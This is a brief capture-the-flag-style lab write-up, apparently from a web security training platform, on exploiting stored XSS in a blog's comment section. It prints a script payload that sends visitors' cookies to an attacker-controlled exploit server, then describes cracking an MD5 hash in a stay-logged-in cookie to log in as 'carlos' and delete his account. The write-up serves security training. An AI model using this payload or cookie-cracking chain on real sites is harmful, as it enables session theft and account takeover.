We discovered that the comment section of posts is vulnerable to stored XSS using a simple alert box payload:
We used the following payload to steal cookies from users visiting the site:
<script>
new Image().src = 'https://exploit-0a6d009f04594f8080605c8e01d2001c.exploit-server.net/?c='+ document.cookie;
</script>Publishing it as a comment on a random post allowed us to capture requests on the attacker-controlled exploit server. We observed internal IPs making GET requests with the secret and stay-logged-in cookies:
Decoding the stay-logged-in cookie revealed the format username:md5hashpassword for the user:
We identified the username carlos and cracked the MD5 hash using CrackStation, allowing us to log in as Carlos:
After logging in, we deleted Carlos’ account and successfully solved the lab:
